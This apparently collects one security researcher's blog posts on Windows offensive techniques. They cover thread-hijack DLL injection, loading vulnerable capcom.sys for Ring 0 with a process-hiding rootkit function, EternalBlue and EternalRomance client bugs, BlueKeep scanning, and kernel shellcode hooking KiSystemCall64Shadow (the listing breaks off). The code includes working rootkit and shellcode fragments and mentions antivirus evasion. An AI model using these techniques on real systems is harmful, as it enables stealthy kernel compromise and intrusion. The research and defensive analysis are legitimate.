In order to get code execution to the point of being able to inject code in another process, you need to be inside of a valid context or previously have necessary function pointers anyways. Since EAF does not alert from a valid context, obtaining pointers in the first place should not be an issue. From there, chaining this method with migration is not a problem.

This kind of removes some of the novelty from reflective DLL injection. It's known that instead of self-loading, it's possible to perform the loader code from the injector (this method is seen in powerkatz.dll [PowerShell Empire's Mimikatz] and process hollowing). However, recently there was a circumstance where I was forced to use reflective injection due to the constraints I was working within. More on that at a later time, but reflective DLL injection, even with this extra step, still has plenty of uses and is highly coupled to the tools we're currently using... This is a simple fix when the issue comes up.

ThreadContinue - Reflective DLL Injection Using SetThreadContext() and NtContinue()

1 July 2017 at 07:52

In the attempt to evade AV, attackers go to great lengths to avoid the common reflective injection code execution function, CreateRemoteThread(). Alternative techniques include native API (ntdll) thread creation and user APCs (necessary for SysWow64->x64), etc.

This technique uses SetThreadContext() to change a selected thread's registers, and performs a restoration process with NtContinue(). This means the hijacked thread can keep doing whatever it was doing, which may be a critical function of the injected application.

You'll notice the PoC (x64 only, #lazy) is using the common VirtualAllocEx() and WriteVirtualMemory() functions. But instead of creating a new remote thread, we piggyback off of an existing one, and restore the original context when we're done with it. This can be done locally (current process) and remotely (target process).

Stage 0: Thread Hijack

Code can be found in hijack/hijack.c

  1. Select a target PID.
  2. Process is opened, and any thread is found.
  3. Thread is suspended, and thread context (CPU registers) copied.
  4. Memory allocated in remote process for reflective DLL.
  5. Memory allocated in remote process for thread context.
  6. Set the thread context stack pointer to a lower address.
  7. Change thread context with SetThreadContext().
  8. Resume the thread execution.

Stage 1: Reflective Restore

Code can be found in dll/ReflectiveDll.c

  1. Normal reflective DLL injection takes place.
  2. Optional: Spawn new thread locally for a primary payload.
  3. Optional: Thread is restored with NtContinue(), using the passed-in previous context.

You can go from x64->SysWow64 using Wow64SetThreadContext(), but not the other way around. I unfortunately did not observe possible sorcery for SysWow64->x64.

One major hiccup to overcome, in x64 mode, is that the register RCX (function param 1) is volatile even across a SetThreadContext() call. To overcome this, I stored a cave (in this case, the DOS header). Luckily, NtContinue() allows setting the volatile registers, so there's no issues in the restoration process, otherwise it would have needed a hacky code cave inserted or something.

    // retrieve CONTEXT from DOS header cave
    lpParameter = (LPVOID)*((PULONG_PTR)((LPBYTE)uiLibraryAddress+2));

Another issue is we could corrupt the original threads stack. I subtracted 0x2000 from RSP to find a new spot to spam up.

I've seen similar (but non-successful) techniques for code injection. I found a rare amount of similar information [1] [2]. These techniques were not interested in performing proper cleanup of the stolen thread, which is not practical in many circumstances. This is essentially the same process that RtlRemoteCall() follows. As such, there may be issues for threads in a wait state returning an incorrect status? None of these sources uses reflective restoration.

As user mode API is highly explored territory, this may not be an original technique. If so, take the example for what it is ([relatively] clean code with academic explanation) and chalk it up to multiple discovery. Leave flames, spam, and questions in the comments!

If you want to learn more about techniques like this, come to the Advanced Windows Post-Exploitation / Malware Forward Engineering DEF CON 25 workshop.

Puppet Strings - Dirty Secret for Windows Ring 0 Code Execution

2 July 2017 at 03:35

Update July 3, 2017: FuzzySec has also previously written some info about this.

Ever since I began reverse engineering Shadow Brokers dumps [1] [2] [3], I've gotten into the habit of codenaming my projects. This trick is called Puppet Strings , and it lets you hitch a free ride into Ring 0 (kernel mode) on Windows.

Some nation-state malware, such as Backdoor.Remsec by the ProjectSauron/Strider APT and Trojan.Turla by the Turla APT, performs a similar operation. However, the traditional nation-state modus operandi involves 0-day exploitation.

But why waste 0-days when you can use kn0wn-days?

Premise

  1. If you're running as an elevated admin, you're allowed to load (signed) drivers.
    • Local users are almost always admins.
    • UAC is known to be fundamentally broken.
  2. Load any (signed) driver with a kn0wn code execution vulnerability and exploit it.
    • It's a fairly obvious idea, and elementary to perform.
    • Windows does not have robust certificate revocation.
      • Thus, the DSE trust model is fundamentally broken!

Ordinarily, Ring 0 is forbidden unless you have an approved Extended Validation (EV) Code-Signing Certificate (out of reach for most, especially for malicious purposes). There is a "Driver Signature Enforcement" (DSE) security feature present in all modern 64-bit versions of Windows.

This enforcement can only be "officially" bypassed in two ways: attaching a kernel debugger or configuration at the advanced boot options menu. While these are common procedures for driver developers, they are highly-atypical actions for the average user.

That's right, I'm talking about simply loading high-profile vulnerable drivers like capcom.sys:

oh dear god this capcom.sys has an ioctl that disables smep and calls a provided function pointer, and sets SMEP back what even pic.twitter.com/jBCXO7YtNe

— slipstream/RoL (@TheWack0lian) September 23, 2016

Originally introduced in September 2016 as a form of video game anti-cheat, it was quickly discovered that the capcom.sys driver has an ioctl which disables Supervisor Mode Execution Prevention (SMEP) and executes a provided Ring 3 (user mode) function pointer with Ring 0 privileges. It's even kind enough to pass you a function pointer to MmGetSystemRoutineAddress(), which is basically like GetProcAddress() but for ntoskrnl.exe exports.

The unfortunate part is it can still be easily loaded and exploited to this day.

My opinion: file reputation for signed binaries should factor in cert validity period, revocation, digest algorithm, and file prevalence.

— Matt Graeber (@mattifestation) June 24, 2017

If a driver is signed with a valid timestamp, it also doesn't matter if the certificate has expired, as long as it isn't revoked. This trick is only possible because the Microsoft and root CA mechanisms for revoking driver signatures seems bad. This halfhearted approach violates the trust model that public key infrastructure is supposed to be built upon, as defined in the X.509 standard. Perhaps like UAC it is not a security boundary?

Capcom.sys has been around for almost a year, and is easily one of the most well-known and simplest driver exploits of all time.

While this driver is flagged 15/61 on VirusTotal, I have a personal list of known-vulnerable drivers that are 0/61 detection. They aren't too hard to find if you keep your eyes open to netsec news.

Proof of Concept

Code is available on GitHub at zerosum0x0/puppetstrings. To run it, you will need to independently obtain the capcom.sys driver (I don't want to deal with weird licensing issues).

Test system was Windows 10 x64 Redstone 3 (Insider pre-release), just to show the new Driver Signing Policies (and its list of exceptions) introduced in Redstone 1 do not address this issue. This works on all versions of Windows if you update the EPROCESS.ActiveProcessLinks offset.

1: kd> dt !_EPROCESS ActiveProcessLinks
   +0x2e8 ActiveProcessLinks : _LIST_ENTRY

For the PoC, I had to do something relatively malicious to get the point across. Getting to Ring 0 with this technique is simple, doing something interesting once there is more difficult (e.g. we can already load drivers, the usual SYSTEM shell can be obtained through less dangerous methods).

I load capcom.sys, pass it a function which performs the old rootkit technique of unlinking the current process from the EPROCESS.ActiveProcessLinks circularly-linked list, and then unload capcom.sys. This methodology is instant and makes the current process not show up in user mode tools like tasklist.exe.

static void rootkit_unlink(PEPROCESS pProcess)
{
 static const DWORD WIN10_RS3_OFFSET = 0x2e8;

 PLIST_ENTRY plist = 
  (PLIST_ENTRY)((LPBYTE)pProcess + WIN10_RS3_OFFSET);

 *((DWORD64*)plist->Blink) = (DWORD64)plist->Flink;
 *((DWORD64*)plist->Flink + 1) = (DWORD64)plist->Blink;

 plist->Flink = (PLIST_ENTRY) &(plist->Flink);
 plist->Blink = (PLIST_ENTRY) &(plist->Flink);
}

Of course, doing this in a modern rootkit is foolish, as PatchGuard has at least 4 different process list checks (CRITICAL_STRUCTURE_CORRUPTION Bug Check Arg4 = 4, 5, 1A, and 1B). But you can get experimental and think of something else cool to do, as you enjoy all of the freedoms Ring 0 brings.

DOUBLEPULSAR showed us there's a lot of creative ideas to run in the kernel, even outside of a driver context. DSEFix exploits the same vulnerable VirtualBox driver used by Trojan.Turla to disable Driver Signature Enforcement entirely. It's even possible to use some undocumented features to create a reflectively-loaded driver, if one were so inclined...

If you want to learn more about techniques like this, come to the Advanced Windows Post-Exploitation / Malware Forward Engineering DEF CON 25 workshop.

Obfuscated String/Shellcode Generator - Online Tool

17 August 2017 at 08:55


String Shellcode |

Shellcode will be cleaned of non-hex bytes using the following algorithm:

s = s.replace(/(0x|0X)/g, "");
s = s.replace(/[^A-Fa-f0-9]/g, "");

See also: Overflow Exploit Pattern Generator - Online Tool.

About this tool

I'm preparing a malware reverse engineering class and building some crackmes for the CTF. I needed to encrypt/obfuscate flags so that they don't just show up with a strings tool. Sure you can crib the assembly and rig this out pretty easily, but the point of these challenges is to instead solve them through behavioral analysis rather than initial assessment. I'm sure this tool will also be good for getting some dirty strings past AV.

Sadly, I'm still not satisfied with the state of C++17 template magic for compile-time string obfuscation or I wouldn't have had to make this. I remember a website that used to do this similar thing for free but at some point it moved to a pay model. I think maybe it had a few extra features?

This instruments pretty nicely though in that an ADD won't be immediately followed by a SUB, which is basically a NOP. Same with XOR, SHIFT, etc. It can also MORPH the output even more by using the current string iteration in the arithmetic to add entropy.

Only ASCII/ANSI is supported because if there's one thing I dislike more than JavaScript it's working with UCS2-LE encodings. And the only language it generates is raw C/C++ because those are the languages you would most likely need something like this for. Post a comment if there's a bug, and feel free to rip the code out if you want to.

Dissecting a Bug in the EternalRomance Client (FuzzBunch)

16 June 2018 at 09:21

Note: This post does not explain the EternalRomance exploit chain, just a quirky bug in the Equation Group's client. For comprehensive exploit details, come see my presentation at DEF CON 26 (August 2018).


Background

In SMBv1, transactions are looked up via their User ID, Tree ID, Process ID, and Multiplex ID fields (UID, TID, PID, MID). This allows a client to have many transactions running at once, as needed. UID and TID are server-assigned, and PID is client-set but usually static. Generally, a client will only use the MID, set to a random value, to distinguish distinct transactions.

Fish in a Barrel

In EternalRomance, the MID must be set to a specific value (File ID). In order for the Equation Group to multiplex multiple transactions, the PID is used instead. The PID is what separates "dynamite sticks" in the Fish-In-A-Barrel heap feng shui.

                                               
Figure 1. Fish in a Barrel (Red: Dynamite - Blue: Fish)

Dynamite are transactions that can (ideally) cause overflow into another transaction. Sometimes a dynamite stick fails, simply because memory allocations can be volatile. In this case, EternalRomance should try the next stick.

Discovering the Bug

I had nop'd out the Srv.sys vulnerability being exploited using WinDbg so that I could observe the network traffic during failures and other various reasons.

I noticed that EternalRomance, during the grooming phase, sent dynamite sticks with PIDs 0, 1, and 2. However, it was only attempting to ignite one PID (dynamite stick) for every execution attempt. The PID 0.

This must be a mistake because igniting the same dynamite 3 times in a row does absolutely nothing but send superfluous network traffic with no change in result. A dynamite stick either works or it simply always will be a dud. And besides, why did it bother to send the other 2 dynamite in the first place?

In fact, igniting the same dynamite stick multiple times is dangerous, because it increments a pointer each time, and the offset for the overwrite (a neighboring MID) stays static. On a side note, I also noticed the first exploit attempt always tries to overwrite two bytes, and all secondary dynamite attempts only overwrite one byte. Because of the way they set up the exploit, only a one byte overwrite is necessary (though two bytes won't hurt if it hits the right place). Another peculiarity.

I messed around with the MaxExploitAttempt settings, which has a default value of 3. I set it to its maximum allowed of 16. Now the PID started at 3?

This time, PIDs 3 through 15 were observed, and the last 3 exploit attempts sent PID=0.

The Binary is Truth

Well some debugging later, I figured out that the InitializeParameters() function (there are no symbols in the binary, but a few functions have helpful debug strings when handling error conditions) was allocating two arrays for the dynamite stick PIDs.

unsigned int size = ExploitStruct->MaxExploitAttempts_0x4360;

if (size PidTable_0x44a0 = (PWORD) TbMalloc(2 * size);
    ExploitStruct->PidTable_0x44a4 = (PWORD) TbMalloc(2 * size);
}
else
{
    // print error message: too many max exploit attempts
}

TbMalloc is Equation Group's library function (tibe-2.dll) that just calls malloc() and then memset() to 0 (essentially calloc() but with one argument).

I set a hardware breakpoint on the tables and noticed that in SmbRemoteApiTransactionGroom() (another unnamed function) there was the following logic. This function completes when the dynamite are initially sent (before any are ignited).

if (DynamiteNum >= 3)
{
    ExploitStruct->PidTable_0x44a4[DynamiteNum - 3] = DynamitePid;
}
else
{ 
    ExploitStruct->PidTable_0x44a0[DynamiteNum] = DynamitePid;
}

Later, in DoWriteAndXExploitTransactionForRemApi(), the table where DynamiteNum >= 3 is used to source PIDs to ignite the dynamite.

This means PidTable_0x44a4 is never given values when MaxExploitAttempts=3. Observe 3 shorts set to 0 at the address in the dump.

And we can see the cause for the quirky behavior of the network traffic starting at PID=3, when MaxExploitAttempts=16 (or any greater than 3). Observe several shorts incrementing from 3, followed by three 0.

As far as I can tell, the PidTable_0x44a0 table (the one that holds the first 3 PIDs) simply isn't used, at least when tested against several versions of Windows XP and Server 2003.

Conclusion

This bug was probably missed, by both analysts and the Equation Group, for a few reasons:

  • Fish in a Barrel is only used for older versions of Windows (it's fixed in 7+)
  • It almost always succeeds the first time, as it is a rarely used pre-allocated heap
  • TbMalloc initializes all PID to 0, and the first dynamite PID is 0
  • The bug is quite subtle, I missed it several times because of assumptions

The real mystery is why is there this logic for the second table that isn't used?

Dissecting a Bug in the EternalBlue Client for Windows XP (FuzzBunch)

25 November 2018 at 01:18

See Also: Dissecting a Bug in the EternalRomance Client (FuzzBunch)

Background 

Pwning Windows 7 was no problem, but I would re-visit the EternalBlue exploit against Windows XP for a time and it never seemed to work. I tried all levels of patching and service packs, but the exploit would either always passively fail to work or blue-screen the machine. I moved on from it, because there was so much more of FuzzBunch that was unexplored.

Well, one day on a pentest a wild Windows XP appeared, and I figured I would give FuzzBunch a go. To my surprise, it worked! And on the first try.

Why did this exploit work in the wild but not against runs in my "lab"?

tl;dr: Differences in NT/HAL between single-core/multi-core/PAE CPU installs causes FuzzBunch's XP payload to abort prematurely on single-core installs.

Multiple Exploit Chains 

Keep in mind that there are several versions of EternalBlue. The Windows 7 kernel exploit has been well documented. There are also ports to Windows 10 which have been documented by myself and JennaMagius as well as sleepya_.

But FuzzBunch includes a completely different exploit chain for Windows XP, which cannot use the same basic primitives (i.e. SMB2 and SrvNet.sys do not exist yet!). I discussed this version in depth at DerbyCon 8.0 (slides / video).

tl;dw: The boot processor KPCR is static on Windows XP, and to gain shellcode execution the value of KPRCB.PROCESSOR_POWER_STATE.IdleFunction is overwritten.

Payload Methodology 

As it turns out, the exploit was working just fine in the lab. What was failing was FuzzBunch's payload.

The main stages of the ring 0 shellcode performs the following actions:

  1. Obtains &nt and &hal using the now-defunct KdVersionBlock trick
  2. Resolves some necessary function pointers, such as hal!HalInitializeProcessor
  3. Restores the boot processor KPCR/KPRCB which was corrupted during exploitation
  4. Runs DoublePulsar to backdoor the SMB service
  5. Gracefully resumes execution at a normal state (nt!PopProcessorIdle)

Single Core Branch Anomaly 

Setting a couple hardware breakpoints on the IdleFunction switch and +0x170 into the shellcode (after a couple initial XOR/Base64 shellcode decoder stages), it is observed that a multi-core machine install branches differently than the single-core machine.

kd> ba w 1 ffdffc50 "ba e 1 poi(ffdffc50)+0x170;g;"

The multi-core machine has acquired a function pointer to hal!HalInitializeProcessor.

Presumably, this function will be called to clean up the semi-corrupted KPRCB.

The single-core machine did not find hal!HalInitializeProcessor... sub_547 instead returned NULL. The payload cannot continue, and will now self destruct by zeroing as much of itself out as it can and set up a ROP chain to free some memory and resume execution.

Note: A successful shellcode execution will perform this action as well, just after installing DoublePulsar first.

Root Cause Analysis 

The shellcode function sub_547 does not properly find hal!HalInitializeProcessor on single core CPU installs, and thus the entire payload is forced to abruptly abort. We will need to reverse engineer the shellcode function to figure out exactly why the payload is failing.

There is an issue in the kernel shellcode that does not take into account all of the different types of the NT kernel executables are available for Windows XP. Specifically, the multi-core processor version of NT works fine (i.e. ntkrnlamp.exe), but a single core install (i.e. ntoskrnl.exe) will fail. Likewise, there is a similar difference in halmacpi.dll vs halacpi.dll.

The NT Red Herring 

The first operation that sub_547 performs is to obtain HAL function imports used by the NT executive. It finds HAL functions by first reading at offset 0x1040 into NT.

On multi-core installs of Windows XP, this offset works as intended, and the shellcode finds hal!HalQueryRealTimeClock:

However, on single-core installations this is not a HAL import table, but instead a string table:

At first I figured this was probably the root cause. But it is a red herring, as there is correction code. The shellcode will check if the value at 0x1040 is an address in the range within HAL. If not it will subtract 0xc40 and start searching in increments of 0x40 for an address within the HAL range, until it reaches 0x1040 again.

Eventually, the single-core version will find a HAL function, this time hal!HalCalibratePerformanceCounter:

This all checks out and is fine, and shows that Equation Group did a good job here for determining different types of XP NT.

HAL Variation Byte Table 

Now that a function within HAL has been found, the shellcode will attempt to locate hal!HalInitializeProcessor. It does so by carrying around a table (at shellcode offset 0x5e7) that contains a 1-byte length field followed by an expected sequence of bytes. The original discovered HAL function address is incremented in search of those bytes within the first 0x20 bytes of a new function.

The desired 5 bytes are easily found in the multi-core version of HAL:

However, the function on single-core HAL is much different.

There is a similar mov instruction, but it is not a movzx. The byte sequence being searched for is not present in this function, and consequently the function is not discovered.

Conclusion 

It is well known (from many flame wars on Windows kernel development mailing lists) that searching for byte sequences to identify functions is unreliable across different versions and service packs of Windows. We have learned from this bug that exploit developers must also be careful to account for differences in single/multi-core and PAE variations of NTOSKRNL and HAL. In this case, the compiler decided to change one movzx instruction to a mov instruction and broke the entire payload.

It is very curious that the KdVersionBlock trick and a byte sequence search is used to find functions in this payload. The Windows 7 payload finds NT and its exports in, as seen, a more reliable way, by searching backwards in memory from the KPCR IDT and then parsing PE headers.

This HAL function can be found through such other means (it appears readily exported by HAL). The corrupted KPCR can also be cleaned up in other ways. But those are both exercises for the reader.

There is circumstantial evidence that primary FuzzBunch development was started in late 2001. The payload seems maybe it was only written for and tested against multi-core processors? Perhaps this could be a indicator as to how recent the XP exploit was first written. Windows XP was broadly released on October 25, 2001. While this is the same year that IBM invented the first dual-core processor (POWER4), Intel and AMD would not have a similar offering until 2004 and 2005, respectively.

This is yet another example of the evolution of these ETERNAL exploits. The Equation Group could have re-used the same exploit and payload primitives, yet chose to develop them using many different methodologies, perhaps so if one methodology was burned they could continue to reap the benefits of their exploit diversification. There is much esoteric Windows kernel internals knowledge that can be learned from studying these exploits.

Avoiding the DoS: How BlueKeep Scanners Work

31 May 2019 at 07:00

Background 

On May 21, @JaGoTu and I released a proof-of-concept GitHub for CVE-2019-0708. This vulnerability has been nicknamed "BlueKeep".

Instead of causing code execution or a blue screen, our exploit was able to determine if the patch was installed.

Now that there are public denial-of-service exploits, I am willing to give a quick overview of the luck that allows the scanner to avoid a blue screen and determine if the target is patched or not.

RDP Channel Internals 

The RDP protocol has the ability to be extended through the use of static (and dynamic) virtual channels, relating back to the Citrix ICA protocol.

The basic premise of the vulnerability is that there is the ability to bind a static channel named "MS_T120" (which is actually a non-alpha illegal name) outside of its normal bucket. This channel is normally only used internally by Microsoft components, and shouldn't receive arbitrary messages.

There are dozens of components that make up RDP internals, including several user-mode DLLs hosted in a SVCHOST.EXE and an assortment of kernel-mode drivers. Sending messages on the MS_T120 channel enables an attacker to perform a use-after-free inside the TERMDD.SYS driver.

That should be enough information to follow the rest of this post. More background information is available from ZDI.

MS_T120 I/O Completion Packets 

After you perform the 200-step handshake required for the (non-NLA) RDP protocol, you can send messages to the individual channels you've requested to bind.

The MS_T120 channel messages are managed in the user-mode component RDPWSX.DLL. This DLL spawns a thread which loops in the function rdpwsx!IoThreadFunc. The loop waits via I/O completion port for new messages from network traffic that gets funneled through the TERMDD.SYS driver.

Note that most of these functions are inlined on Windows 7, but visible on Windows XP. For this reason I will use XP in screenshots for this analysis.

MS_T120 Port Data Dispatch 

On a successful I/O completion packet, the data is sent to the rdpwsx!MCSPortData function. Here are the relevant parts:

We see there are only two valid opcodes in the rdpwsx!MCSPortData dispatch:

    0x0 - rdpwsx!HandleConnectProviderIndication
    0x2 - rdpwsx!HandleDisconnectProviderIndication + rdpwsx!MCSChannelClose

If the opcode is 0x2, the rdpwsx!HandleDisconnectProviderIndication function is called to perform some cleanup, and then the channel is closed with rdpwsx!MCSChannelClose.

Since there are only two messages, there really isn't much to fuzz in order to cause the BSoD. In fact, almost any message dispatched with opcode 0x2, outside of what the RDP components are expecting, should cause this to happen.

Patch Detection 

I said almost any message, because if you send the right sized packet, you will ensure that proper cleanup is performed:

It's real simple: If you send a MS_T120 Disconnect Provider (0x2) message that is a valid size, you get proper clean up. There should not be risk of denial-of-service.

The use-after-free leading to RCE and DoS only occurs if this function skips the cleanup because the message is the wrong size!

Vulnerable Host Behavior 

On a VULNERABLE host, sending the 0x2 message of valid size causes the RDP server to cleanup and close the MS_T120 channel. The server then sends a MCS Disconnect Provider Ultimatum PDU packet, essentially telling the client to go away.

And of course, with an invalid size, you RCE/BSoD.

Patched Host Behavior 

However on a patched host, sending the MS_T120 channel message in the first place is a NOP... with the patch you can no longer bind this channel incorrectly and send messages to it. Therefore, you will not receive any disconnection notice.

In our scanner PoC, we sleep for 5 seconds waiting for the MCS Disconnect Provider Ultimatum PDU, before reporting the host as patched.

CPU Architecture Differences 

Another stroke of luck is the ability to mix and match the x86 and x64 versions of the 0x2 message. The 0x2 messages require different sizes between the two architectures, which one might think sending both at once should cause the denial-of-service.

Simply, besides the sizes being different, the message opcode is in a different offset. So on the opposite architecture, with a 0'd out packet (besides the opcode), it will think you are trying to perform the Connect 0x0 message. The Connect 0x0 message requires a much larger message and other miscellaneous checks to pass before proceeding. The message for another architecture will just be ignored.

This difference can possibly also be used in an RCE exploit to detect if the target is x86 or x64, if a universal payload is not used.

Conclusion 

This is an interesting quirk that luckily allows system administrators to quickly detect which assets remain unpatched within their networks. I released a similar scanner for MS17-010 about a week after the patch, however it went largely unused until big-name worms such as WannaCry and NotPetya started to hit. Hopefully history won't repeat and people will use this tool before a crisis.

Unfortunately, @ErrataRob used a fork of our original scanner to determine that almost 1 million hosts are confirmed vulnerable and exposed on the external Internet.

It is my knowledge that the 360 Vulcan team released a (closed-source) scanner before @JaGoTu and I, which probably follows a similar methodology. Products such as Nessus have now incorporated plugins with this methodology. While this blog post discusses new details about RDP internals related the vulnerability, it does not contain useful information for producing an RCE exploit that is not already widely known.

Fixing Remote Windows Kernel Payloads to Bypass Meltdown KVA Shadow

8 November 2019 at 07:03

Update 11/8/2019: @sleepya_ informed me that the call-site for BlueKeep shellcode is actually at PASSIVE_LEVEL. Some parts of the call gadget function acquire locks and raise IRQL, causing certain crashes I saw during early exploit development. In short, payloads can be written that don't need to deal with KVA Shadow. However, this writeup can still be useful for kernel exploits such as EternalBlue and possibly future others.

Background 

BlueKeep is a fussy exploit. In a lab environment, the Metasploit module can be a decently reliable exploit*. But out in the wild on penetration tests the results have been... lackluster.

While I mostly blamed my failed experiences on the mystical reptilian forces that control everything, something inside me yearned for a more difficult explanation.

After the first known BlueKeep attacks hit this past weekend, a tweet by sleepya slipped under the radar, but immediately clued me in to at least one major issue.

From call stack, seems target has kva shadow patch. Original eternalblue kernel shellcode cannot be used on kva shadow patch target. So the exploit failed while running kernel shellcode

— Worawit Wang (@sleepya_) November 3, 2019

Turns out my BlueKeep development labs didn't have the Meltdown patch, yet out in the wild it's probably the most common case.

tl;dr: Side effects of the Meltdown patch inadvertently breaks the syscall hooking kernel payloads used in exploits such as EternalBlue and BlueKeep. Here is a horribly hacky way to get around it... but: it pops system shells so you can run Mimikatz, and after all isn't that what it's all about?

Galaxy Brain tl;dr: Inline hook compatibility for both KiSystemCall64Shadow and KiSystemCall64 instead of replacing IA32_LSTAR MSR.

PoC||GTFO: Experimental MSF BlueKeep + Meltdown Diff GitHub

* Fine print: BlueKeep can be reliable with proper knowledge of the NPP base address, which varies radically across VM families due to hotfix memory increasing the PFN table size. There's also an outstanding issue or two with the lock in the channel structure, but I digress.

Meltdown CPU Vulnerability 

Meltdown (CVE-2017-5754), released alongside Spectre as "Variant 3", is a speculative execution CPU bug announced in January 2018.

As an optimization, modern processors are loading and evaluating and branching ("speculating") way before these operations are "actually" to be run. This can cause effects that can be measured through side channels such as cache timing attacks. Through some clever engineering, exploitation of Meltdown can be abused to read kernel memory from a rogue userland process.

KVA Shadow 

Windows mitigates Meltdown through the use of Kernel Virtual Address (KVA) Shadow, known as Kernel Page-Table Isolation (KPTI) on Linux, which are differing implementations of the KAISER fix in the original whitepaper.

When a thread is in user-mode, its virtual memory page tables should not have any knowledge of kernel memory. In practice, a small subset of kernel code and structures must be exposed (the "Shadow"), enough to swap to the kernel page tables during trap exceptions, syscalls, and similar.

Switching between user and kernel page tables on x64 is performed relatively quickly, as it is just swapping out a pointer stored in the CR3 register.

KiSystemCall64Shadow Changes 

The above illustrated process can be seen in the patch diff between the old and new NTOSKRNL system call routines.

Here is the original KiSystemCall64 syscall routine (before Meltdown):

The swapgs instruction changes to the kernel gs segment, which has a KPCR structure at offset 0. The user stack is stored at gs:0x10 (KPCR->UserRsp) and the kernel stack is loaded from gs:0x1a8 (KPCR->Prcb.RspBase).

Compare to the KiSystemCall64Shadow syscall routine (after the Meltdown patch):

  1. Swap to kernel GS segment
  2. Save user stack to KPCR->Prcb.UserRspShadow
  3. Check if KPCR->Prcb.ShadowFlags first bit is set
  • Set CR3 to KPCR->Prcb.KernelDirectoryTableBase
  • Load kernel stack from KPCR->Prcb.RspBaseShadow
  • The kernel chooses whether to use the Shadow version of the syscall at boot time in nt!KiInitializeBootStructures, and sets the ShadowFlags appropriately.

    NOTE: I have highlighted the common push 2b instructions above, as they will be important for the shellcode to find later on.

    Existing Remote Kernel Payloads 

    The authoritative guide to kernel payloads is in Uninformed Volume 3 Article 4 by skape and bugcheck. There you can read all about the difficulties in tasks such as lowering IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL, as well as moving code execution out from Ring 0 and into Ring 3.

    Hooking IA32_LSTAR MSR 

    In both EternalBlue and BlueKeep, the exploit payloads start at the DISPATCH_LEVEL IRQL.

    To oversimplify, on Windows NT the processor Interrupt Request Level (IRQL) is used as a sort of locking mechanism to prioritize different types of kernel interrupts. Lowering the IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL is a requirement to access paged memory and execute certain kernel routines that are required to queue a user mode APC and escape Ring 0. If IRQL is dropped artificially, deadlocks and other bugcheck unpleasantries can occur.

    One of the easiest, hackiest, and KPP detectable ways (yet somehow also one of the cleanest) is to simply write the IA32_LSTAR (0xc000082) MSR with an attacker-controlled function. This MSR holds the system call function pointer.

    User mode executes at PASSIVE_LEVEL, so we just have to change the syscall MSR to point at a secondary shellcode stage, and wait for the next system call allowing code execution at the required lower IRQL. Of course, existing payloads store and change it back to its original value when they're done with this stage.

    Double Fault Root Cause Analysis 

    Hooking the syscall MSR works perfectly fine without the Meltdown patch (not counting Windows 10 VBS mitigations, etc.). However, if KVA Shadow is enabled, the target will crash with a UNEXPECTED_KERNEL_MODE_TRAP (0x7F) bugcheck with argument EXCEPTION_DOUBLE_FAULT (0x8).

    We can see that at this point, user mode can see the KiSystemCall64Shadow function:

    However, user mode cannot see our shellcode location:

    The shellcode page is NOT part of the KVA Shadow code, so user mode doesn't know of its existence. The kernel gets stuck in a recursive loop of trying to handle the page fault until everything explodes!

    Hooking KiSystemCall64Shadow 

    So the Galaxy Brain moment: instead of replacing the IA32_LSTAR MSR with a fake syscall, how about just dropping an inline hook into KiSystemCall64Shadow? After all, the KVASCODE section in ntoskrnl is full of beautiful, non-paged, RWX, padded, and userland-visible memory.

    Heuristic Offset Detection 

    We want to accomplish two things:

    1. Install our hook in a spot after kernel pages CR3 is loaded.
    2. Provide compatibility for both KiSystemCall64Shadow and KiSystemCall64 targets.

    For this reason, I scan for the push 2b sequence mentioned earlier. Even though this instruction is 2-bytes long (also relevant later), I use a 4-byte heuristic pattern (0x652b6a00 little endian) as the preceding byte and following byte are stable in all versions of ntoskrnl that I analyzed.

    The following shellcode is the 0th stage that runs after exploitation:

    payload_start:
    ; read IA32_LSTAR
        mov ecx, 0xc0000082         
        rdmsr
    
        shl rdx, 0x20
        or rax, rdx                 
        push rax
    
    ; rsi = &KiSystemCall64Shadow
        pop rsi                      
    
    ; this loop stores the offset to push 2b into ecx
    _find_push2b_start:
        xor ecx, ecx
        mov ebx, 0x652b6a00
    
    _find_push2b_loop:
        inc ecx
        cmp ebx, dword [rsi + rcx - 1]
        jne _find_push2b_loop
    

    This heuristic is amazingly solid, and keeps the shellcode portable for both versions of the system call. There are even offset differences between the Windows 7 and Windows 10 KPCR structure that don't matter thanks to this method.

    The offset and syscall address are stored in a shared memory location between the two stages, for dealing with the later cleanup.

    Atomic x64 Function Hooking 

    It is well known that inline hooking on x64 comes with certain annoyances. All code overwrites need to be atomic operations in order to not corrupt the executing state of other threads. There is no direct jmp imm64 instruction, and early x64 CPUs didn't even have a lock cmpxchg16b function!

    Fortunately, Microsoft has hotpatching built into its compiler. Among other things, this allows Microsoft to patch certain functionality or vulnerabilities of Windows without needing to reboot the system, if they like. Essentially, any function that is hotpatch-able gets padded with NOP instructions before its prologue. You can put the ultimate jmp target code gadgets in this hotpatch area, and then do a small jmp inside of the function body to the gadget.

    We're in x64 world so there's no classic mov edi, edi 2-byte NOP in the prologue; however in all ntoskrnl that I analyzed, there were either 0x20 or 0x40 bytes worth of NOP preceding the system call routine. So before we attempt to do anything fancy with the small jmp, we can install the BIG JMP function to our fake syscall:

    ; install hook call in KiSystemCall64Shadow NOP padding
    install_big_jmp:
    
    ; 0x905748bf = nop; push rdi; movabs rdi &fake_syscall_hook;
        mov dword [rsi - 0x10], 0xbf485790 
        lea rdi, [rel fake_syscall_hook]
        mov qword [rsi - 0xc], rdi
    
    ; 0x57c3 = push rdi; ret;
        mov word [rsi - 0x4], 0xc357
    
    ; ... 
    
    fake_syscall_hook:
    
    ; ...
    
    

    Now here's where I took a bit of a shortcut. Upon disassembling C++ std::atomic<std::uint16_t>, I saw that mov word ptr is an atomic operation (although sometimes the compiler will guard it with the poetic mfence).

    Fortunately, small jmp is 2 bytes, and the push 2b I want to overwrite is 2 bytes.

    ; install tiny jmp to the NOP padding jmp
    install_small_jmp:
    
    ; rsi = &syscall+push2b
        add rsi, rcx
    
    ; eax = jmp -x
    ; fix -x to actual offset required
        mov eax, 0xfeeb
        shl ecx, 0x8
        sub eax, ecx
        sub eax, 0x1000
    
    ; push 2b => jmp -x;
        mov word [rsi], ax        
    

    And now the hooks are installed (note some instructions are off because of x64 instruction variable length and alignment):

    On the next system call: the kernel stack and page tables will be loaded, our small jmp hook will goto big jmp which will goto our fake syscall handler at PASSIVE_LEVEL.

    Cleaning Up the Hook 

    Multiple threads will enter into the fake syscall, so I use the existing sleepya_ locking mechanism to only queue a single APC with a lock:

    ; this syscall hook is called AFTER kernel stack+KVA shadow is setup
    fake_syscall_hook:
    
    ; save all volatile registers
        push rax
        push rbp
        push rcx
